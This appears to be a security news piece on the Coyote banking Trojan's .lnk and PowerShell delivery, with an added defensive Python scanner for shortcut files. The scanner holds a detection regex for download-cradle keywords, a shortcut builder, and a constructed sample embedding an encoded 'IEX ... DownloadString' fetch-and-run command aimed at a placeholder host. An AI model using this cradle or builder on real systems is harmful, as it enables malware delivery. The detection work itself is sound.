Brazilian users are currently being targeted by a malicious campaign delivering Coyote, a sophisticated banking Trojan. Fortinet's analysis reveals that the malware is propagated through Windows Shortcut (.lnk) files containing PowerShell commands, which trigger a multi-stage attack chain. First documented by Kaspersky, Coyote can extract information from over 70 financial applications. The malware establishes persistence by modifying the Windows registry, so that it is relaunched after reboot and remains active on infected machines.
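The shortcut-based delivery described above is what a defender can hunt for on disk. The following Python script is an added example for this page, not code from the article or from Fortinet's or Kaspersky's analysis of Coyote: it parses the Shell Link header and StringData sections of a .lnk file (per the MS-SHLLINK format), flags shortcuts whose target or arguments invoke PowerShell, and decodes an -EncodedCommand argument (base64 of UTF-16LE text) so the hidden command can be read. The indicator list is an assumption to be tuned per environment, and the sample shortcut at the bottom is constructed here, not a real Coyote artifact.

```python
"""Scan Windows shortcut (.lnk) files for embedded PowerShell launch commands.

Added example, not code from the article or from any vendor's Coyote analysis.
The sample shortcut is constructed here, not a real malware artifact.
"""
import base64
import re
import struct
import uuid

LNK_CLSID = uuid.UUID("00021401-0000-0000-C000-000000000046")
HEADER_SIZE = 0x4C

# LinkFlags bits (MS-SHLLINK 2.1.1) that decide what follows the header.
HAS_LINK_TARGET_ID_LIST = 1 << 0
HAS_LINK_INFO = 1 << 1
HAS_NAME = 1 << 2
HAS_RELATIVE_PATH = 1 << 3
HAS_WORKING_DIR = 1 << 4
HAS_ARGUMENTS = 1 << 5
HAS_ICON_LOCATION = 1 << 6
IS_UNICODE = 1 << 7

# StringData sections appear in this fixed order, each only if its flag is set.
STRING_SECTIONS = [
    (HAS_NAME, "name"),
    (HAS_RELATIVE_PATH, "relative_path"),
    (HAS_WORKING_DIR, "working_dir"),
    (HAS_ARGUMENTS, "arguments"),
    (HAS_ICON_LOCATION, "icon_location"),
]

# Assumed indicators of a PowerShell launch or download cradle; tune per environment.
SUSPICIOUS = re.compile(
    r"powershell|pwsh|-enc|-e\b|-nop|-w(?:indowstyle)?\s+hidden|bypass|iex|"
    r"invoke-expression|downloadstring|invoke-webrequest|frombase64string",
    re.IGNORECASE,
)


def parse_lnk(data: bytes) -> dict:
    """Return the StringData fields (name, relative_path, arguments, ...) of a .lnk blob."""
    if len(data) < HEADER_SIZE:
        raise ValueError("too short to be a shell link")
    header_size, = struct.unpack_from("<I", data, 0)
    if header_size != HEADER_SIZE or uuid.UUID(bytes_le=data[4:20]) != LNK_CLSID:
        raise ValueError("not a shell link file")
    flags, = struct.unpack_from("<I", data, 0x14)
    pos = HEADER_SIZE
    if flags & HAS_LINK_TARGET_ID_LIST:   # IDListSize (2 bytes) + ItemIDList, skipped
        size, = struct.unpack_from("<H", data, pos)
        pos += 2 + size
    if flags & HAS_LINK_INFO:             # LinkInfoSize counts itself, skipped
        size, = struct.unpack_from("<I", data, pos)
        pos += size
    unicode = bool(flags & IS_UNICODE)
    width = 2 if unicode else 1
    fields = {}
    for flag, name in STRING_SECTIONS:
        if not flags & flag:
            continue
        count, = struct.unpack_from("<H", data, pos)   # CountCharacters, no terminator
        pos += 2
        raw = data[pos:pos + count * width]
        pos += count * width
        fields[name] = raw.decode("utf-16-le" if unicode else "cp1252", "replace")
    return fields


def decode_encoded_command(args: str):
    """Decode a -EncodedCommand (or -e/-ec/-enc) argument: base64 of UTF-16LE text."""
    m = re.search(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", args, re.IGNORECASE)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def scan_lnk(data: bytes) -> dict:
    """Parse a shortcut and report PowerShell indicators in its strings and decoded command."""
    fields = parse_lnk(data)
    decoded = decode_encoded_command(fields.get("arguments", ""))
    haystack = " ".join(fields.values()) + " " + (decoded or "")
    indicators = sorted({m.group(0).lower() for m in SUSPICIOUS.finditer(haystack)})
    return {"suspicious": bool(indicators), "indicators": indicators,
            "decoded_command": decoded, "fields": fields}


def build_lnk(relative_path: str, arguments: str) -> bytes:
    """Build a minimal Unicode shell link (header + RELATIVE_PATH + COMMAND_LINE_ARGUMENTS)."""
    flags = HAS_RELATIVE_PATH | HAS_ARGUMENTS | IS_UNICODE
    # HeaderSize, LinkCLSID, LinkFlags, FileAttributes (ARCHIVE), three FILETIMEs,
    # FileSize, IconIndex, ShowCommand (SW_SHOWNORMAL), HotKey, Reserved1..3.
    header = struct.pack("<I", HEADER_SIZE) + LNK_CLSID.bytes_le + struct.pack(
        "<IIQQQIIIHHII", flags, 0x20, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0)

    def string_data(s: str) -> bytes:
        return struct.pack("<H", len(s)) + s.encode("utf-16-le")
    return header + string_data(relative_path) + string_data(arguments)


# Constructed sample: a shortcut hiding a download cradle behind -EncodedCommand.
# The URL uses the reserved .invalid TLD, so nothing is ever contacted.
SAMPLE_COMMAND = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage2')"
SAMPLE_ARGS = ("-NoProfile -WindowStyle Hidden -EncodedCommand "
               + base64.b64encode(SAMPLE_COMMAND.encode("utf-16-le")).decode())
SAMPLE_LNK = build_lnk(r"..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", SAMPLE_ARGS)
BENIGN_LNK = build_lnk(r"..\Documents\report.docx", "")

if __name__ == "__main__":
    for label, blob in (("sample", SAMPLE_LNK), ("benign", BENIGN_LNK)):
        print(label, scan_lnk(blob))
```

To use it on real files, read each .lnk as bytes and pass it to scan_lnk; the parser deliberately skips the LinkTargetIDList and LinkInfo structures, because for triage the RELATIVE_PATH and COMMAND_LINE_ARGUMENTS strings are where a PowerShell launcher and its encoded payload live.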
Once deployed, the Coyote Banking Trojan can carry out various malicious activities, including keylogging, capturing screenshots, and displaying phishing overlays to steal sensitive credentials.
The injected shellcode is generated with Donut, an open-source loader that decrypts and executes the final MSIL (Microsoft Intermediate Language, i.e. .NET) payloads in memory rather than dropping them to disk.